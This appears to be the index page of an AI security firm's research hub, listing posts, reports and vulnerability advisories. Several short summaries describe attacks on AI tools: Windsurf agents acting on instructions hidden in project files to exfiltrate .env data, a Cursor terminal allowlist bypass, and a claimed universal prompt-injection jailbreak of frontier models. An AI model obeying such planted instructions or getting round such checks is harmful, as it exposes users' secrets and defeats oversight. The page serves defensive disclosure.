Innovation Hub

Featured Posts

Insights
min read

Claude Mythos: AI Security Gaps Beyond Vulnerability Discovery

Insights
min read

Reflections on RSAC 2026: Moving Beyond Messaging and Sponsored Lists to Measurable AI Security

Insights
min read

Securing AI Agents: The Questions That Actually Matter

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research
min read

AI Agents in Production: Security Lessons from Recent Incidents

Research
min read

LiteLLM Supply Chain Attack

Research
min read

Exploring the Security Risks of AI Assistants like OpenClaw

Research
min read

Agentic ShadowLogic

Videos

Report and Guides

Report and Guide
min read

2026 AI Threat Landscape Report

Register today to receive your copy of the report on March 18th and secure your seat for the accompanying webinar on April 8th.

Report and Guide
min read

Securing AI: The Technology Playbook

A practical playbook for securing, governing, and scaling AI applications for Tech companies.

Report and Guide
min read

Securing AI: The Financial Services Playbook

A practical playbook for securing, governing, and scaling AI systems in financial services.

HiddenLayer AI Security Research Advisory

CVE-2026-3071

Flair Vulnerability Report

An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

In the News

News
XX
min read
HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

News
XX
min read
HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

News
XX
min read
HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

Insights
min read

RSAC 2025 Takeaways

RSA Conference 2025 may be over, but conversations are still echoing about what’s possible with AI and what’s at risk. This year’s theme, “Many Voices. One Community,” reflected the growing understanding that AI security isn’t a challenge one company or sector can solve alone. It takes shared responsibility, diverse perspectives, and purposeful collaboration.

Insights
min read

Universal Bypass Discovery: Why AI Systems Everywhere Are at Risk

HiddenLayer researchers have developed the first single, universal prompt injection technique, post-instruction hierarchy, that successfully bypasses safety guardrails across nearly all major frontier AI models. This includes models from OpenAI (GPT-4o, GPT-4o-mini, and even the newly announced GPT-4.1), Google (Gemini 1.5, 2.0, and 2.5), Microsoft (Copilot), Anthropic (Claude 3.7 and 3.5), Meta (Llama 3 and 4 families), DeepSeek (V3, R1), Qwen (2.5 72B), and Mixtral (8x22B).

Insights
min read

How To Secure Agentic AI

Artificial Intelligence is entering a new chapter defined not just by generating content but by taking independent, goal-driven action. This evolution is called agentic AI. These systems don’t simply respond to prompts; they reason, make decisions, contact tools, and carry out tasks across systems, all with limited human oversight. In short, they are the architects of their own workflows.

Insights
min read

What’s New in AI

The past year brought significant advancements in AI across multiple domains, including multimodal models, retrieval-augmented generation (RAG), humanoid robotics, and agentic AI.

Insights
min read

Securing Agentic AI: A Beginner's Guide

The rise of generative AI has unlocked new possibilities across industries, and among the most promising developments is the emergence of agentic AI. Unlike traditional AI systems that respond to isolated prompts, agentic AI systems can plan, reason, and take autonomous action to achieve complex goals.

Insights
min read

AI Red Teaming Best Practices

Organizations deploying AI must ensure resilience against adversarial attacks before models go live. This blog covers best practices for <a href="https://hiddenlayer.com/innovation-hub/a-guide-to-ai-red-teaming/">AI red teaming, drawing on industry frameworks and insights from real-world engagements by HiddenLayer’s Professional Services team.

Insights
min read

AI Security: 2025 Predictions Recommendations

It’s time to dust off the crystal ball once again! Over the past year, AI has truly been at the forefront of cyber security, with increased scrutiny from attackers, defenders, developers, and academia. As various forms of generative AI drive mass AI adoption, we find that the threats are not lagging far behind, with LLMs, RAGs, Agentic AI, integrations, and plugins being a hot topic for researchers and miscreants alike.

Insights
min read

Securely Introducing Open Source Models into Your Organization

Open source models are powerful tools for data scientists, but they also come with risks. If your team downloads models from sources like Hugging Face without security checks, you could introduce security threats into your organization. You can eliminate this risk by introducing a process that scans models for vulnerabilities before they enter your organization and are utilized by data scientists. You can ensure that only safe models are used by leveraging HiddenLayer's Model Scanner combined with your CI/CD platform. In this blog, we'll walk you through how to set up a system where data scientists request models, security checks run automatically, and approved models are stored in a safe location like cloud storage, a model registry, or Databricks Unity Catalog.

Insights
min read

Enhancing AI Security with HiddenLayer’s Refusal Detection

Security risks in AI applications are not one-size-fits-all. A system processing sensitive customer data presents vastly different security challenges compared to one that aggregates internet data for market analysis. To effectively safeguard an AI application, developers and security professionals must implement comprehensive mechanisms that instruct models to decline contextually malicious requests—such as revealing personally identifiable information (PII) or ingesting data from untrusted sources. Monitoring these refusals provides an early and high-accuracy warning system for potential malicious behavior.

Insights
min read

Why Revoking Biden’s AI Executive Order Won’t Change Course for CISOs

On 20 January 2025, President Donald Trump rescinded former President Joe Biden’s 2023 executive order on artificial intelligence (AI), which had established comprehensive guidelines for developing and deploying AI technologies. While this action signals a shift in federal policy, its immediate impact on the AI landscape is minimal for several reasons.

Insights
min read

HiddenLayer Achieves ISO 27001 and Renews SOC 2 Type 2 Compliance

Security compliance is more than just a checkbox - it’s a fundamental requirement for protecting sensitive data, building customer trust, and ensuring long-term business growth. At HiddenLayer, security has always been at the core of our mission, and we’re proud to announce that we have achieved SOC 2 Type 2 and ISO 27001 compliance. These certifications reinforce our commitment to providing our customers with the highest level of security and reliability.

Insights
min read

AI Risk Management: Effective Strategies and Framework

Artificial Intelligence (AI) is no longer just a buzzword—it’s a cornerstone of innovation across industries. However, with great potential comes significant risk. Effective AI Risk Management is critical to harnessing AI’s benefits while minimizing vulnerabilities. From data breaches to adversarial attacks, understanding and mitigating risks ensures that AI systems remain trustworthy, secure, and aligned with organizational goals.

Webinars

Offensive and Defensive Security for Agentic AI

Webinars

How to Build Secure Agents

Webinars

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

Webinars

HiddenLayer Webinar: 2024 AI Threat Landscape Report

Webinars

HiddenLayer Model Scanner

Webinars

HiddenLayer Webinar: A Guide to AI Red Teaming

Webinars

HiddenLayer Webinar: Accelerating Your Customer's AI Adoption

Webinars

HiddenLayer: AI Detection Response for GenAI

Webinars

HiddenLayer Webinar: Women Leading Cyber

research
min read

AI Agents in Production: Security Lessons from Recent Incidents

research
min read

LiteLLM Supply Chain Attack

research
min read

Exploring the Security Risks of AI Assistants like OpenClaw

research
min read

Agentic ShadowLogic

research
min read

MCP and the Shift to AI Systems

research
min read

The Lethal Trifecta and How to Defend Against It

research
min read

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

research
min read

Same Model, Different Hat

research
min read

The Expanding AI Cyber Risk Landscape

research
min read

The First AI-Powered Cyber Attack

research
min read

Prompts Gone Viral: Practical Code Assistant AI Viruses

research
min read

Persistent Backdoors

Report and Guide
min read

2026 AI Threat Landscape Report

Report and Guide
min read

Securing AI: The Technology Playbook

Report and Guide
min read

Securing AI: The Financial Services Playbook

Report and Guide
min read

AI Threat Landscape Report 2025

Report and Guide
min read

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide
min read

A Step-By-Step Guide for CISOS

Report and Guide
min read

AI Threat landscape Report 2024

Report and Guide
min read

HiddenLayer and Intel eBook

Report and Guide
min read

Forrester Opportunity Snapshot

Report and Guide
min read

Gartner® Report: 3 Steps to Operationalize an Agentic AI Code of Conduct for Healthcare CIOs

news
min read

HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

news
min read

HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

news
min read

HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

news
min read

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

news
min read

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

news
min read

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

news
min read

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

news
min read

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

news
min read

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

news
min read

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

news
min read

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

news
min read

One Prompt Can Bypass Every Major LLM’s Safeguards

SAI Security Advisory

Pickle Load in Serialized Profile Load

An attacker can create a maliciously crafted Ydata-profiling report containing malicious code and share it with a victim. When the victim loads the report, the code will be executed on their system.

SAI Security Advisory

Model Deserialization Leads to Code Execution

An attacker can create a malicious crafted model containing an OperatorFuncNode, and share it with a victim. If the victim is using Python 3.11 or later and loads the malicious model arbitrary code will execute on their system.

SAI Security Advisory

Command Injection in CaptureDependency Function

A command injection vulnerability exists inside the capture_dependencies function of the AWS Sagemakers util file. If a user used the util function when creating their code, an attacker can leverage the vulnerability to run arbitrary commands on a system running the code by injecting a system command into the string passed to the function.

SAI Security Advisory

Command Injection in Capture Dependency

An attacker can inject a malicious pickle object into a numpy file and share it with a victim user. When the victim uses the NumpyDeserializer.deserialize function of the base_deserializers python file to load it, the allow_pickle optional argument can be set to ‘false’ and passed to np.load, leading to the safe loading of the file. However, by default the optional parameter was set to true, so if this is not specifically changed by the victim, this will result in the loading and execution of the malicious pickle object.

SAI Security Advisory

R-bitrary Code Execution Through Deserialization Vulnerability

An attacker could leverage the R Data Serialization format to insert arbitrary code into an RDS formatted file, or an R package as an RDX or RDB component, which will be executed when referenced or called with ReadRDS. This is because of the lazy evaluation process used in the unserialize function of the R programming language.

SAI Security Advisory

Out of bounds read due to lack of string termination in assert

An attacker can create a malicious onnx model which fails an assert statement in a way that an error string equal to or greater than 2048 characters is printed out and share it with a victim. When the victim tries to load the onnx model a string is created which leaks program memory.

SAI Security Advisory

Path sanitization bypass leading to arbitrary read

An attacker can create a malicious onnx model containing paths to externally located tensors and share it with a victim. When the victim tries to load the externally located tensors a directory traversal attack can occur leading to an arbitrary read on a victim’s system leading to information disclosure.

SAI Security Advisory

Web Server Renders User HTML Leading to XSS

An attacker can provide a URL rather than uploading an image to the Debug Samples tab of an Experiment. If the URL has the extension .html, the web server retrieves the HTML page, which is assumed to contain trusted data. The HTML is marked as safe and rendered on the page, resulting in arbitrary JavaScript running in any user’s browser when they view the samples tab.

SAI Security Advisory

Cross-Site Request Forgery in ClearML Server

An attacker can craft a malicious web page that triggers a CSRF when visited. When a user browses to the malicious web page a request is sent which can allow an attacker to fully compromise a user’s account.

SAI Security Advisory

Improper Auth Leading to Arbitrary Read-Write Access

An attacker can, due to lack of authentication, arbitrarily upload, delete, modify, or download files on the fileserver, even if the files belong to another user.

SAI Security Advisory

Path Traversal on File Download

An attacker can upload or modify a dataset containing a link pointing to an arbitrary file and a target file path. When a user interacts with this dataset, such as when using the Dataset.squash method, the file is written to the target path on the user’s system.

SAI Security Advisory

Pickle Load on Artifact Get

An attacker can create a pickle file containing arbitrary code and upload it as an artifact to a Project via the API. When a victim user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.

Thanks for your message!

We will reach back to you as soon as possible.

Oops! Something went wrong while submitting the form.